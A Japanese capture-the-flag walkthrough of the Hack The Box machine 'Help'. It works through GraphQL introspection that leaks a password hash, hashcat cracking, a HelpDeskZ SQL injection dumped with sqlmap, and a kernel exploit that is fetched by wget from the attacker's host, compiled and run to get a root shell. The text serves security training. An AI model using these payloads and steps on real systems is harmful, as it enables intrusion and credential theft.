目次
偵察/スキャン
nmapでスキャンします。
「nmap -p- 10.10.10.121」の結果よりいくつかのポートが開いていることが確認できます。
上記の結果を踏まえ、開いているポートに対してさらにnmapで調査を行います。
┌──(kali㉿kali)-[~/help] └─$ sudo nmap -p22,80,3000 -sC -sV -A 10.10.10.121 [sudo] kali のパスワード: Starting Nmap 7.94SVN ( https://nmap.org ) Nmap scan report for 10.10.10.121 Host is up (0.21s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA) | 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA) |_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519) 80/tcp open http Apache httpd 2.4.18 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Did not follow redirect to http://help.htb/ 3000/tcp open http Node.js Express framework |_http-title: Site doesn't have a title (application/json; charset=utf-8). Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 214.20 ms 10.10.14.1 2 215.11 ms 10.10.10.121
各ポートについて、より詳細に確認していきます。
TCP/80の調査
ブラウザでアクセスしましたがページはありませんでした。
dirbでは以下のページが見つかります。
---- Scanning URL: http://help.htb/ ---- + http://help.htb/index.html (CODE:200|SIZE:11321) ==> DIRECTORY: http://help.htb/javascript/ + http://help.htb/server-status (CODE:403|SIZE:296) ==> DIRECTORY: http://help.htb/support/
supportにアクセスすると以下のような画面が表示されます。
認証情報が必要なようです。
TCP/3000の調査
アクセスすると以下のような画面が表示されます。
メッセージより、認証情報が取得できるようです。
このページではGraphQLを使用しており、以下のコマンドでスキーマの情報が取得できます。
┌──(kali㉿kali)-[~/help] └─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { queryType { name, fields { name, description } } } }" }' | jq -c . {"data":{"__schema":{"queryType":{"name":"Query","fields":[{"name":"user","description":""}]}}}} ┌──(kali㉿kali)-[~/help] └─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq -c . {"data":{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}} ┌──(kali㉿kali)-[~/help] └─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq . { "data": { "__type": { "name": "User", "fields": [ { "name": "username" }, { "name": "password" } ] } } } ┌──(kali㉿kali)-[~/help] └─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq -c . {"data":{"user":{"username":"helpme@helpme.com","password":"5d3c93182bb20f07b994a7f617e99cff"}}} ┌──(kali㉿kali)-[~/help] └─$
最後のコマンドではなぜか「User」では失敗しました。
取得できたpasswordはMD5で暗号化されているようです。
┌──(kali㉿kali)-[~/help] └─$ hashid 5d3c93182bb20f07b994a7f617e99cff Analyzing '5d3c93182bb20f07b994a7f617e99cff' [+] MD2 [+] MD5 [+] MD4 [+] Double MD5 [+] LM [+] RIPEMD-128 [+] Haval-128 [+] Tiger-128 [+] Skein-256(128) [+] Skein-512(128) [+] Lotus Notes/Domino 5 [+] Skype [+] Snefru-128 [+] NTLM [+] Domain Cached Credentials [+] Domain Cached Credentials 2 [+] DNSSEC(NSEC3) [+] RAdmin v2.x
hashcatで解読します。
┌──(kali㉿kali)-[~/help] └─$ hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ============================================================================================================================================ * Device #1: cpu-penryn-AMD Ryzen 3 3100 4-Core Processor, 3920/7904 MB (1024 MB allocatable), 4MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Early-Skip * Not-Salted * Not-Iterated * Single-Hash * Single-Salt * Raw-Hash ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 1 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 Cracking performance lower than expected? * Append -O to the commandline. This lowers the maximum supported password/salt length (usually down to 32). * Append -w 3 to the commandline. This can cause your screen to lag. * Append -S to the commandline. This has a drastic speed impact but can be better for specific attacks. Typical scenarios are a small wordlist but a large ruleset. * Update your backend API runtime / driver the right way: https://hashcat.net/faq/wrongdriver * Create more work items to make use of your parallelization power: https://hashcat.net/faq/morework 5d3c93182bb20f07b994a7f617e99cff:godhelpmeplz Session..........: hashcat Status...........: Cracked Hash.Mode........: 0 (MD5) Hash.Target......: 5d3c93182bb20f07b994a7f617e99cff Time.Started.....: Thu Jul 25 21:02:20 2024 (11 secs) Time.Estimated...: Thu Jul 25 21:02:31 2024 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 780.4 kH/s (0.23ms) @ Accel:512 Loops:1 Thr:1 Vec:4 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 7839744/14344385 (54.65%) Rejected.........: 0/7839744 (0.00%) Restore.Point....: 7837696/14344385 (54.64%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: godilu1 -> gocubs2512 Hardware.Mon.#1..: Util: 56%
アクセス取得
/supportに戻って認証情報を入力するとログインできました。
HelpDeskZは、オープンソースのヘルプデスクシステムで、SQLインジェクションの脆弱性があります。
ログインして添付ファイル付きのチケットを作成します。
作成したチケットの添付ファイルリンクは以下のようなもので、SQLiの脆弱性は最後のパラメータにあります。
http://10.10.10.121/support/?v=view_tickets&action=ticket¶m=4¶m=attachment¶m=1¶m=6
アクセスするURLの末尾に「%20and%201=1--%20-」を追加することで脆弱性を確認できます。「1=1」の場合はファイルのダウンロードができ、「1=2」のようにするとエラー画面が表示されます。
sqlmapでアカウント情報を調査します。
Brupからリクエストをファイルにコピーします。
テーブル情報を出力します。
┌──(kali㉿kali)-[~/htb/help] └─$ sqlmap -r request -p param[] --tables ___ __H__ ___ ___[)]_____ ___ ___ {1.8.6.3#dev} |_ -| . [(] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [23:00:24] [INFO] parsing HTTP request from 'request' [23:00:24] [INFO] resuming back-end DBMS 'mysql' [23:00:24] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: param[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: v=view_tickets&action=ticket¶m[]=4¶m[]=attachment¶m[]=1¶m[]=6 AND 2767=2767 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: v=view_tickets&action=ticket¶m[]=4¶m[]=attachment¶m[]=1¶m[]=6 AND (SELECT 9605 FROM (SELECT(SLEEP(5)))oNEB) ~中略~ Database: support [19 tables] +------------------------------------------------------+ | articles | | attachments | | canned_response | | custom_fields | | departments | | emails | | error_log | | file_types | | knowledgebase_category | | login_attempt | | login_log | | news | | pages | | priority | | settings | | staff | | tickets | | tickets_messages | | users | +------------------------------------------------------+
次に「staff」のテーブルの中身を出力します。
┌──(kali㉿kali)-[~/htb/help] └─$ sqlmap -r request -p param[] -D support -T staff --dump ___ __H__ ___ ___[(]_____ ___ ___ {1.8.6.3#dev} |_ -| . ['] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program ~中略~ [20:35:58] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] y [20:36:03] [INFO] starting dictionary-based cracking (sha1_generic_passwd) [20:36:03] [INFO] starting 4 processes [20:36:05] [INFO] cracked password 'Welcome1' for user 'admin' Database: support Table: staff [1 entry] +----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+ | id | email | login | avatar | admin | status | fullname | password | timezone | username | signature | department | last_login | newticket_notification | +----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+ | 1 | support@mysite.com | 1547216217 | NULL | 1 | Enable | Administrator | d318f44739dced66793b1a603028133a76ae680e (Welcome1) || admin | Best regards,\r\nAdministrator | a:1:{i:0;s:1:"1";} | 1543429746 | 0 | +----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+ [20:36:16] [INFO] table 'support.staff' dumped to CSV file '/home/kali/.local/share/sqlmap/output/help.htb/dump/support/staff.csv' [20:36:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/help.htb'
上記でパスワード情報が取得できました。この情報sshにアクセスするとログインができました。
権限昇格
Ubuntuのカーネルバージョンで検索すると以下のエクスプロイトが見つかります。
helpからKaliにある上記のエクスプロイトを取得し実行するとrootが取得できました。
help@help:~$ wget http://10.10.14.3/44298.c --2024-07-29 05:42:37-- http://10.10.14.3/44298.c Connecting to 10.10.14.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 5773 (5.6K) [text/x-csrc] Saving to: ‘44298.c’ 44298.c 100%[=================================================================================================================>] 5.64K 8.35KB/s in 0.7s 2024-07-29 05:42:38 (8.35 KB/s) - ‘44298.c’ saved [5773/5773] help@help:~$ gcc -o a 44298.c help@help:~$ ./a task_struct = ffff88003b953800 uidptr = ffff88003712b544 spawning root shell root@help:~#